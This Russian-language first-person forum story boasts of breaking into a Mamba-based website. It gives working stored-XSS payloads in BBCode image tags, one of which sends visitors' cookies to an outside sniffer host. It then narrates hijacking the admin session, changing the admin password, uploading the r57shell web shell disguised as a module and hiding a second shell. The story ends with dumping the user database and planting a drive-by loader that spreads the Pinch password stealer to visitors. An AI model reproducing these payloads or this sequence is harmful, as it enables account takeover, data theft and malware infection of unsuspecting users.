Это моя первая статья и просвещенна она взлому сайта при помощи xss.
Одним днем, когда делать было не чего я просматривал все знакомые мне форумы и сайты: оставлял сообщения, читал чужые и тд. Мне захотелось взломать один сайт, на котором стояла Mamba. По привычке запустил NMAP и полез на секлаб посмотреть нет ли уязвимостей у этого движка. Через минут десять NMAP показал список установленных сервисов, но нечего мне это не дало, так как все они были достаточно новые, так же в багтраках ничего не нашлось. Я думал уже плюнуть на сайт, но что то мне подсказывало, где то есть все таки брешь! Ну я и принялся проверять скрипты: подставлять заветную кавычку и это тоже мне не дало результатов. Потом я зашел в свои данные на сайте(я был зарегистрирован на этом сайте) и начал упорно вставлять банальную XSS и опять как на зло результатов не было!
Время было позднее и надо было что-то делать, тогда я принялся за форум и начал постить сообщения, в надежде на XSS-уязвимость и наконец свершилось: была найдена XSS-уязвимость:
PHP код:
[image=http://ya.ru/1.gif OnError="alert(document.cookie)"][/image]
и вот меня приветствуют мои Куки! Я быстренько зарегал себе сниффер на http://s.netsec.ru . Изменил значение ядовитой XSS и она приняла вид:
PHP код:
[image=http://ya.ru/1.gif OnError="open('http://s.netsec.ru/sniffer.gif?'+document.cookie)"][/image]
. И я стал ждать когда же админ зайдет на этот пост… Прошло минут двадцать как у меня уже появились Куки админа. Я быстренько полез в настройке моей любимой Oper'ы и поменял мои Куки на админские. И вот оно сообщение: Добро пожаловать admin! Итак я радостно полез в админку, но тут меня остановили и потребовали пароль! Недолго думая я залез в личные данные админа и поменял его пароль на 123! Теперь я мог свободно зайти в админку и начал быстро искать заветную строчку: залить шелл! Но такой к сожалению не оказалось, а жаль, но за то была: загрузить новый модуль! Притом файлы надо было запаковать в архив, не долго думаю я уже нажимал отправить! Вдруг выскочила ошибка: мол ну типа что-то тут у тебя не правильно!
Хм… Зашел на Яндекс и написал модули для Мамбы и скачал один из них. Оказывается он стоял из xml и php файлов. Я удалил php файл и за место него поставил всем известный r57shell и снова заархивировал. Вот он ответственный момент: я нажимаю кнопку Загрузить. Ага все ок наш модуль установлен и на него выведена ссылка, быстренько кликаю на не и вот перед о мной шелл. Итак я через него заливаю второй шелл, предварительно переименовав, и кинул в самую жопу, чтоб не палился. Удаляем установленный модуль с шеллом, чтобы не палиться и заходим в новый. Итак у нас Фрибзд новой ветки, да тут рута не получишь =(( Но не беда быстренько сделал дамп очень большой базы и кидаю себе на комп. В базе всего 3000 юзеров и что интересное в базе были найдены пароли от других сайтов!
Тут я встал пред выбором, а что собственно делать дальше установить проксю или … Я скопировал ссылку шелла и бросил к себе в файл Заначка. Но потом когда я увидел что у большенства народа шести знак это на меня навело идейку а не кинуть ли мне на сайт пинча! Итак я быстренько добавил код на главную страницу автоматического загрузчика файлов, написанного на Яве. И пошел спать… На следующий день, когда я зашел на свое мыло это просто было невероятно стока отчетов от пинча е-мое! Потихоньку стал их разбирать среди обыкновенных девяток лежали и шести знаки и не только пароли к фтп, к мылу и тд. Вот это выдался взомчик!